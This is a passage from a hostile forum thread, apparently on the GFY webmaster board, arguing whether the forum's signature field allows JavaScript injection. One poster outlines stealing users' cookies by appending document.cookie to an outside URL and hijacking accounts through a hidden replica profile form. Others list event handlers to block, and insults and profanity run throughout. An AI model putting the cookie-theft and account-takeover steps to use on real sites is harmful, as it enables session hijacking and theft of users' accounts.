|
50 GFY codes Exploitable :glugglug
|
Hehe nice job Road Rash do you have ICQ!
|
If you weren't such a pompus ass and obvious attention whore people might think you were actually trying to help.
|
Quote:
|
Road Rash I would also like to see how this code works and how it can be fixed if you can email me the code to harbinc at cox.net
|
Quote:
what it actually is. It makes you look like you don't understand the code your posting when you call it HTML and say it can do anything on any server. What you are talking about is a very particular combination of techniques. Once you know the combination it does indeed appear easy and many of us have seen these techniques used before in different situations. However without investigation of the steps needed someone can't just spend 10 seconds looking at the code to figure out exact what the fuck it is you are talking about. I'm guessing english isn't your first language.... no offence but when you use all the wrong words and describe things totally backwards it does kinda make it hard for anyone to agree with you. Quote:
rather than talking all this crap about server hacking and sending emails. Lens.... He is right... It is exploitable. You need to block a few event handlers such as onstart, onclick, etc. -Ben |
You know no one gives a shit when....
Road Rash 23 mryellow 7 icedemon 4 You have three times as many posts as the second person in the thread (who successfully tore you down, might I add) No I will not grab a brain and no I'm not your son. http://www.polarhome.com/~plasticlsd/4smokey.MP3 nobody |
jc so far everyone who doubted me has admitted after thinking about it for 2 seconds they were wrong .. Go back to bed jc. :)
|
It's just the guy mixes in so much bullshit with his facts that it
makes him appear like he has no idea what he's talking about. Nice camouflage job... However I think I'd rather appear smart then dumb. Did it take you 2 seconds to come up with? Stop trying to make ppl feel bad for not understanding your backwards and simply wrong comments. -Ben |
Go back to the secureity forum.... where peopel give a fuck.
Your nothing but an exploit baby. Produce one piece of usefull software you have written. FEEL THE NOBODIES, WANNA BE SOMBODIES..... <img src="http://www.gofuckyourself.com/images/smilies/1orglaugh.gif" width=360 height=360> |
mryellowsnow.
as i explained if i gave exact details on it it would also explain to every little punk with a copy and paste how to do it , so thats why i was vague.. sorry if you couldnt figure that out.. |
I can see how what you mentioned can be used to make popups and other stuff in j a v a s c r i p t that could cause trouble on GFY. What you found is a good find. But you really made it more than it really is. It can't do most of the stuff you mentioned.
Being able to change the password by having the cookie sent to you cannot be done. At least without asking the client permission before it is actually sent. It could be done with old browsers (I'm talking about the really old ones on Win 95 machines). But most newer browsers won't let emails be sent via j a v a s c r i p twithout permission from the client first. Sending out emails via j a v a s c r i p tused to be a big problem in the early days. That's how emails were harvested. That has since been fixed for some years now. |
See the problem?
People still think you're talking about hacking servers or sending emails from client machines. It's not the fact that you hid the method.... I do think that was quite good of you..... It's that you were talking about totally different things which were quite simply wrong. You can not for example do anything to any server with the method you're using. You really can't blame someone for thinking you're barking up the wrong tree when you say that jav-as-cript can do anything you want to the server. Hide the actual code sure..... but why make yourself look stupid by saying things that are so wrong. Lens it does need fixing..... He may look stupid but he has found an exploit that someone will probably soon use and could upset some ppl. -Ben |
You dont need to use email just add the cookie to a string and pop it in a window example, yoururl.com/logged.cgi?+document . cookie
to change passwrod just make a hidden form with a replica of the profile form ( but with your own info ) now the email is whatever you changed it to , now just reset the password and have it sent to the new email , shebang. |
For somebody that is so good at 'hacking' you sure do suck at reading and understanding the sig rules.
:glugglug |
duocash is a top banner sponsor moron
|
Without actual testing I'm still not sure you'd fit in everything you
want to do into the character limit. However yes it is a worry. -Ben |
Quote:
2. Signature rules. Maximum 120x60 button and no more than 3 text lines of default size and color. New as of 1/1/2003: if your sig is for a GFY top banner sponsor, you may use a 468x60 instead of a 120x60. Yes there is a reason this is so big. Also putting your text in a cell and making it look like a button is against the rules. Let me repeat... A 120 x 60 button and no more that 3 lines of DEFAULT SIZE AND COLOR text. First, your sig banner is 645 x 120 -- that is ABOVE THE ALLOWED 468x60 for top banner sponsor. Second, your text is NOT the default size OR color. So eat a dick buttmunch --- go google for more GFY hacks :thefinger |
like i said i have already tested it , it fits under the character limit just fine besides you can hide an unlimited amount of characters in a hahahahahahahahahaha ;) with a document write ....
To the moron complaining about my sig.. my sig fits gfy see the top 10 posters on this board... my sig is the same. quit crying because you cant say anything usefull |
Quote:
"Mommy, mommy - the other kids are doing it, so that means its ok right mommy?" :1orglaugh :1orglaugh :1orglaugh like I said, you sure do have a hard time reading and understanding the sig rules. |
I dont bend over , you do.. big difference.
Why would i use an undersized sig when the mods allow people to use oversized sigs if they are using a top sponsor. Maybe if you sent one of the mods and angry email about it or cried to them via icq they might change all the sigs just for you.. Whoops i must have been dreaming there for a second :1orglaugh |
ext jv.... yeah got ya.
-Ben |
Something close to this..
<img src="http://216.130.172.224/haha1.jpg"> <img src="http://216.130.172.224/haha2.jpg"> <img src="http://216.130.172.224/haha3.jpg"> |
No no.... much more dangerious.
You could run any new IE, ActiveX, Java, or Flash exploit on a great deal of GFY members before the admins saw it. This combined with other exploits or some yet to be discovered could allow an attacker to gain complete control of your home system via your browser. -Ben |
Quote:
|
GFY needs to block the following words:
onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick hahahahahahahadown hahahahahahahamove hahahahahahahaout hahahahahahahaover hahahahahahahaup -Ben |
Quote:
yes, those hahaha's will fuck you up everytime sorry, it was funny... |
Quote:
BTW you missed a few event handlers ;) and several other things.. |
Yeah can't be bothered hunting everything, leave that to GFY.
Just posting again to see if they are blocked...... Lens.... It's actually quite serious. onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick -Ben |
| All times are GMT -7. The time now is 07:08 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123